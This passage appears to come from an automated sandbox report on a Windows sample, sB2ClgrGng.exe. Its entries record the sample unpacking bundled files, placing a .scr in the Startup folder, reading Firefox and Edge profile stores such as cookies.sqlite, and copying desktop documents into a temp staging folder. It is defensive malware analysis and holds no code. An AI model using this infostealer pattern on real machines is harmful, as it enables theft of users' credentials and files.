Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ \System\Antivirus.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
